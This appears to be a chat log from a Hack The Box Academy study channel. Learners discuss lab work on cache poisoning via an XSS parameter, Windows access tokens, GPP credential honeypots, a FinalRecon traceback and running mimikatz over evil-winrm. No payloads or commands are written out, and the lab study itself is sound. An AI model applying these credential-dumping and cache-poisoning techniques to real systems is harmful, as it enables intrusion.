In Abusing HTTP Misconfigurations Skill Assessment - Hard, I got XSS on the sort_by param, and I try many unkeyed the param technique include "parameter Cloaking" and "Fat GET". Anyone could help me on this please?

normal sand
next bronze
#

yep

#

you're assigned one during log on, the other you'll need to elevate

normal sand
next bronze
#

well it also depends on the user, if you're a standard domain user and used another uer's creds for UAC elevation, you're using their token and security context, not your own

next bronze
quiet trout
#

On the Windows Attacks & Defense module,

https://academy.hackthebox.com/module/176/section/1780

its discussing a GPP cached cred attack and suggests flagging the policy XML file for honey pot. I've noticed this file appears to exist within a GUID/SID/SPN(?) (not sure which) and im curious whether this is a file per user, or if this is a ... well how to identify what it is exactly within the context of the extra directories seen in sysvol... chat gpt thinks they're GUIDs, I suppose I could use a ps cmdlet to identify what it is once i know it, is that kinda all there is to it? identify whether its a GUID/SID and then identify it using the cmldet?

normal sand
next bronze
#

yep, you get a shell as the user you entered the creds for. that part is pretty much just logging in

quiet trout
#

pretty much im just looking to identify the policy names from their (GUIDs?) but unsure the best way to go about that

normal sand
# next bronze you're assigned one during log on, the other you'll need to elevate

From the resource you shared:

When a user signs in, the system creates an access token for that user. The access token contains information about the level of access that the user is granted, including specific security identifiers (SIDs) and Windows privileges.

When an administrator logs on, two separate access tokens are created for the user: a standard user access token and an administrator access token.

So not all users have two access tokens? Only administrators? I'm confused now.

next bronze
normal sand
next bronze
#

if it's required, yeah

normal sand
#

Alrighty, thanks a lot for the explanation!

fleet fern
#

Hi guys, im getting stuck on start finalrecon enumeration

#

Traceback (most recent call last):
File "/home/user/FinalRecon/./finalrecon.py", line 186, in <module>
parsed_url = extractor.extract_urllib(split_url)
^^^^^^^^^^^^^^^^^^^^^^^^
AttributeError: 'TLDExtract' object has no attribute 'extract_urllib'

rocky estuary
#

guys i'm doing the AD skill assessments II and i got access to MS01 host i'm trying to use mimikatz but i can't its keep spamming "mimikatz #" in the terminal i'm using evil-winrm to connect

#

i tried to use wmiexec but i get this error [-] rpc_s_access_denied

wary plover